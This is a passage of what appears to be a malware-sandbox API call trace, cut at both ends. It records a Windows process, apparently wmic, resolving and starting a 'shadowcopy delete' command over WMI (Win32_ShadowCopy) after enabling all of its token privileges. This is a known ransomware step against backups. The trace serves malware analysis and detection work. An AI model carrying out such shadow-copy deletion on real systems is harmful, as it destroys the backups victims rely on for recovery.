(_String1="delete", _String2="\"NULL\"") returned 66 [0107.468] memmove_s (in: _Destination=0x5322bf0, _DestinationSize=0x4, _Source=0x5320598, _SourceSize=0x4 | out: _Destination=0x5322bf0) returned 0x0 [0107.468] lstrlenW (lpString="QUIT") returned 4 [0107.468] lstrlenW (lpString="shadowcopy") returned 10 [0107.468] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0107.468] lstrlenW (lpString="EXIT") returned 4 [0107.468] lstrlenW (lpString="shadowcopy") returned 10 [0107.469] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0107.469] WbemLocator:IUnknown:AddRef (This=0x5105b70) returned 0x2 [0107.469] lstrlenW (lpString="/") returned 1 [0107.469] lstrlenW (lpString="shadowcopy") returned 10 [0107.469] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0107.469] lstrlenW (lpString="-") returned 1 [0107.469] lstrlenW (lpString="shadowcopy") returned 10 [0107.469] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0107.469] lstrlenW (lpString="CLASS") returned 5 [0107.469] lstrlenW (lpString="shadowcopy") returned 10 [0107.469] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0107.469] lstrlenW (lpString="PATH") returned 4 [0107.469] lstrlenW (lpString="shadowcopy") returned 10 [0107.469] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0107.469] lstrlenW (lpString="CONTEXT") returned 7 [0107.469] lstrlenW (lpString="shadowcopy") returned 10 [0107.469] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0107.469] lstrlenW (lpString="shadowcopy") returned 10 [0107.469] lstrlenW (lpString="shadowcopy") returned 10 [0107.469] GetCurrentThreadId () returned 0x538 [0107.469] ??0CHString@@QAE@XZ () returned 0x4edf998 [0107.469] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5105b70, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x9a9540 | out: ppNamespace=0x9a9540*=0x5125350) returned 0x0 [0108.525] CoSetProxyBlanket (pProxy=0x5125350, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0108.526] ??1CHString@@QAE@XZ () returned 0x740c6430 [0108.526] GetCurrentThreadId () returned 0x538 [0108.526] ??0CHString@@QAE@XZ () returned 0x4edf940 [0108.526] SysStringLen (param_1="root\\cli") returned 0x8 [0108.526] SysStringLen (param_1="\\") returned 0x1 [0108.526] SysStringLen (param_1="root\\cli\\") returned 0x9 [0108.526] SysStringLen (param_1="ms_409") returned 0x6 [0108.526] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5105b70, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x9a9544 | out: ppNamespace=0x9a9544*=0x5125170) returned 0x0 [0108.767] ??1CHString@@QAE@XZ () returned 0x740c6430 [0108.767] GetCurrentThreadId () returned 0x538 [0108.767] ??0CHString@@QAE@XZ () returned 0x4edf99c [0108.768] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0108.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961478, cbMultiByte=-1, lpWideCharStr=0x5328a78, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0108.768] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0108.768] SysStringLen (param_1="shadowcopy") returned 0xa [0108.768] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0108.768] SysStringLen (param_1="'") returned 0x1 [0108.768] IWbemServices:GetObject (in: This=0x5125350, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x4edf998*=0x0, ppCallResult=0x0 | out: ppObject=0x4edf998*=0x513cb88, ppCallResult=0x0) returned 0x0 [0108.888] IWbemClassObject:Get (in: This=0x513cb88, wszName="Target", lFlags=0, pVal=0x4edf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.888] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0108.888] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0108.888] IWbemClassObject:Get (in: This=0x513cb88, wszName="PWhere", lFlags=0, pVal=0x4edf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.888] lstrlenW (lpString=" Where ID = '#'") returned 15 [0108.888] lstrlenW (lpString=" Where ID = '#'") returned 15 [0108.889] IWbemClassObject:Get (in: This=0x513cb88, wszName="Connection", lFlags=0, pVal=0x4edf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf970*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x514e7c8, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.889] IUnknown:QueryInterface (in: This=0x514e7c8, riid=0x9669ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x4edf98c | out: ppvObject=0x4edf98c*=0x514e7c8) returned 0x0 [0108.889] GetCurrentThreadId () returned 0x538 [0108.889] ??0CHString@@QAE@XZ () returned 0x4edf90c [0108.889] IWbemClassObject:Get (in: This=0x514e7c8, wszName="Namespace", lFlags=0, pVal=0x4edf8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.889] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0108.889] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0108.889] IWbemClassObject:Get (in: This=0x514e7c8, wszName="Locale", lFlags=0, pVal=0x4edf8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x513b6cc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.889] lstrlenW (lpString="ms_409") returned 6 [0108.889] lstrlenW (lpString="ms_409") returned 6 [0108.889] IWbemClassObject:Get (in: This=0x514e7c8, wszName="User", lFlags=0, pVal=0x4edf8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x513b6cc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf8f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.889] IWbemClassObject:Get (in: This=0x514e7c8, wszName="Password", lFlags=0, pVal=0x4edf8f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf8f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.889] IWbemClassObject:Get (in: This=0x514e7c8, wszName="Server", lFlags=0, pVal=0x4edf8f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.889] lstrlenW (lpString=".") returned 1 [0108.889] lstrlenW (lpString=".") returned 1 [0108.890] IWbemClassObject:Get (in: This=0x514e7c8, wszName="Authority", lFlags=0, pVal=0x4edf8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x513b6cc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf8f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.890] ??1CHString@@QAE@XZ () returned 0x740c6430 [0108.890] IUnknown:Release (This=0x514e7c8) returned 0x1 [0108.890] GetCurrentThreadId () returned 0x538 [0108.890] ??0CHString@@QAE@XZ () returned 0x4edf8fc [0108.890] IWbemClassObject:Get (in: This=0x513cb88, wszName="__RELPATH", lFlags=0, pVal=0x4edf8e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf8e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.890] GetCurrentThreadId () returned 0x538 [0108.890] ??0CHString@@QAE@XZ () returned 0x4edf878 [0108.890] ??0CHString@@QAE@PBG@Z () returned 0x4edf874 [0108.890] ??0CHString@@QAE@ABV0@@Z () returned 0x4edf7f4 [0108.890] ?Empty@CHString@@QAEXXZ () returned 0x740c6430 [0108.890] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x5328af8 [0108.890] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0108.890] ?Left@CHString@@QBE?AV1@H@Z () returned 0x4edf7ec [0108.890] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x4edf7f0 [0108.890] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x4edf874 [0108.890] ??1CHString@@QAE@XZ () returned 0x1 [0108.890] ??1CHString@@QAE@XZ () returned 0x1 [0108.890] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x4edf7e8 [0108.890] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x4edf7f4 [0108.890] ??1CHString@@QAE@XZ () returned 0x1 [0108.890] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x5328b60 [0108.890] ?Find@CHString@@QBEHPBG@Z () returned 0xa [0108.890] ?Left@CHString@@QBE?AV1@H@Z () returned 0x4edf7ec [0108.890] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x4edf7f0 [0108.890] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x4edf874 [0108.890] ??1CHString@@QAE@XZ () returned 0x1 [0108.890] ??1CHString@@QAE@XZ () returned 0x1 [0108.890] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x4edf7e8 [0108.890] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x4edf7f4 [0108.890] ??1CHString@@QAE@XZ () returned 0x740c6430 [0108.890] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x740c6424 [0108.891] ??1CHString@@QAE@XZ () returned 0x740c6430 [0108.891] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0108.891] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0108.891] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0108.891] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0108.891] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0108.891] SysStringLen (param_1="\"") returned 0x1 [0108.891] IWbemServices:GetObject (in: This=0x5125170, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x4edf884*=0x0, ppCallResult=0x0 | out: ppObject=0x4edf884*=0x514eb20, ppCallResult=0x0) returned 0x0 [0109.001] IWbemClassObject:Get (in: This=0x514eb20, wszName="Text", lFlags=0, pVal=0x4edf850*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4edf850*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5139a58*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x512acb0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.001] SafeArrayGetLBound (in: psa=0x5139a58, nDim=0x1, plLbound=0x4edf860 | out: plLbound=0x4edf860) returned 0x0 [0109.001] SafeArrayGetUBound (in: psa=0x5139a58, nDim=0x1, plUbound=0x4edf864 | out: plUbound=0x4edf864) returned 0x0 [0109.001] SafeArrayGetElement (in: psa=0x5139a58, rgIndices=0x4edf87c, pv=0x4edf868 | out: pv=0x4edf868) returned 0x0 [0109.001] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0109.001] IUnknown:Release (This=0x514eb20) returned 0x0 [0109.001] ??1CHString@@QAE@XZ () returned 0x1 [0109.001] ??1CHString@@QAE@XZ () returned 0x740c6430 [0109.001] ??1CHString@@QAE@XZ () returned 0x740c6430 [0109.001] lstrlenW (lpString="Shadow copy management.") returned 23 [0109.001] lstrlenW (lpString="Shadow copy management.") returned 23 [0109.001] IUnknown:Release (This=0x513cb88) returned 0x0 [0109.002] ??1CHString@@QAE@XZ () returned 0x740c6430 [0109.002] lstrlenW (lpString="PATH") returned 4 [0109.002] lstrlenW (lpString="delete") returned 6 [0109.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0109.002] lstrlenW (lpString="WHERE") returned 5 [0109.002] lstrlenW (lpString="delete") returned 6 [0109.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0109.002] lstrlenW (lpString="(") returned 1 [0109.002] lstrlenW (lpString="delete") returned 6 [0109.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0109.002] lstrlenW (lpString="/") returned 1 [0109.002] lstrlenW (lpString="delete") returned 6 [0109.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0109.002] lstrlenW (lpString="-") returned 1 [0109.002] lstrlenW (lpString="delete") returned 6 [0109.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0109.002] lstrlenW (lpString="GET") returned 3 [0109.002] lstrlenW (lpString="delete") returned 6 [0109.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0109.002] lstrlenW (lpString="LIST") returned 4 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0109.003] lstrlenW (lpString="SET") returned 3 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0109.003] lstrlenW (lpString="CREATE") returned 6 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0109.003] lstrlenW (lpString="CALL") returned 4 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0109.003] lstrlenW (lpString="ASSOC") returned 5 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0109.003] lstrlenW (lpString="DELETE") returned 6 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0109.003] lstrlenW (lpString="/") returned 1 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0109.003] lstrlenW (lpString="-") returned 1 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] lstrlenW (lpString="GET") returned 3 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0109.003] lstrlenW (lpString="LIST") returned 4 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0109.003] lstrlenW (lpString="SET") returned 3 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0109.003] lstrlenW (lpString="CREATE") returned 6 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0109.003] lstrlenW (lpString="CALL") returned 4 [0109.003] lstrlenW (lpString="delete") returned 6 [0109.004] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0109.004] lstrlenW (lpString="ASSOC") returned 5 [0109.004] lstrlenW (lpString="delete") returned 6 [0109.004] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0109.004] lstrlenW (lpString="DELETE") returned 6 [0109.004] lstrlenW (lpString="delete") returned 6 [0109.004] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0109.004] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0109.004] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0109.004] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x15ef08ad | out: _String="Select", _Context=0x15ef08ad) returned="Select" [0109.004] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x15ef08ad | out: _String=0x0, _Context=0x15ef08ad) returned="*" [0109.004] lstrlenW (lpString="FROM") returned 4 [0109.004] lstrlenW (lpString="*") returned 1 [0109.004] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0109.004] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x15ef08ad | out: _String=0x0, _Context=0x15ef08ad) returned="from" [0109.004] lstrlenW (lpString="FROM") returned 4 [0109.004] lstrlenW (lpString="from") returned 4 [0109.004] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0109.004] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x15ef08ad | out: _String=0x0, _Context=0x15ef08ad) returned="Win32_ShadowCopy" [0109.004] lstrlenW (lpString="SET") returned 3 [0109.004] lstrlenW (lpString="delete") returned 6 [0109.004] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0109.004] lstrlenW (lpString="CREATE") returned 6 [0109.004] lstrlenW (lpString="delete") returned 6 [0109.004] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0109.004] lstrlenW (lpString="GET") returned 3 [0109.004] lstrlenW (lpString="delete") returned 6 [0109.004] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0109.005] lstrlenW (lpString="LIST") returned 4 [0109.005] lstrlenW (lpString="delete") returned 6 [0109.005] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0109.005] lstrlenW (lpString="ASSOC") returned 5 [0109.005] lstrlenW (lpString="delete") returned 6 [0109.005] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0109.005] WbemLocator:IUnknown:AddRef (This=0x5105b70) returned 0x3 [0109.005] lstrlenW (lpString="") returned 0 [0109.005] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.005] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0109.005] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.005] lstrlenW (lpString="LHNIWSJ") returned 7 [0109.005] GetCurrentThreadId () returned 0x538 [0109.005] GetCurrentProcess () returned 0xffffffff [0109.005] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x4edfa08 | out: TokenHandle=0x4edfa08*=0x298) returned 1 [0109.005] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4edfa04 | out: TokenInformation=0x0, ReturnLength=0x4edfa04) returned 0 [0109.005] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x5328b30, TokenInformationLength=0x118, ReturnLength=0x4edfa04 | out: TokenInformation=0x5328b30, ReturnLength=0x4edfa04) returned 1 [0109.005] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x5328b30*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0109.005] CloseHandle (hObject=0x298) returned 1 [0109.005] lstrlenW (lpString="GET") returned 3 [0109.005] lstrlenW (lpString="delete") returned 6 [0109.005] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0109.005] lstrlenW (lpString="LIST") returned 4 [0109.005] lstrlenW (lpString="delete") returned 6 [0109.005] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0109.005] lstrlenW (lpString="SET") returned 3 [0109.005] lstrlenW (lpString="delete") returned 6 [0109.005] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0109.005] lstrlenW (lpString="CALL") returned 4 [0109.005] lstrlenW (lpString="delete") returned 6 [0109.005] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0109.005] lstrlenW (lpString="ASSOC") returned 5 [0109.005] lstrlenW (lpString="delete") returned 6 [0109.005] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0109.005] lstrlenW (lpString="CREATE") returned 6 [0109.005] lstrlenW (lpString="delete") returned 6 [0109.006] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0109.006] lstrlenW (lpString="DELETE") returned 6 [0109.006] lstrlenW (lpString="delete") returned 6 [0109.006] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0109.006] lstrlenA (lpString="") returned 0 [0109.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x962b44, cbMultiByte=-1, lpWideCharStr=0x5323a48, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.006] lstrlenA (lpString="") returned 0 [0109.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x962b44, cbMultiByte=-1, lpWideCharStr=0x5323a48, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.006] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0109.006] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0109.006] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x15ef0b65 | out: _String="Select", _Context=0x15ef0b65) returned="Select" [0109.006] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x15ef0b65 | out: _String=0x0, _Context=0x15ef0b65) returned="*" [0109.006] lstrlenW (lpString="FROM") returned 4 [0109.006] lstrlenW (lpString="*") returned 1 [0109.006] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0109.006] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x15ef0b65 | out: _String=0x0, _Context=0x15ef0b65) returned="from" [0109.006] lstrlenW (lpString="FROM") returned 4 [0109.006] lstrlenW (lpString="from") returned 4 [0109.006] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0109.006] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x15ef0b65 | out: _String=0x0, _Context=0x15ef0b65) returned="Win32_ShadowCopy" [0109.006] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0109.007] SysStringLen (param_1="Win32_ShadowCopy") 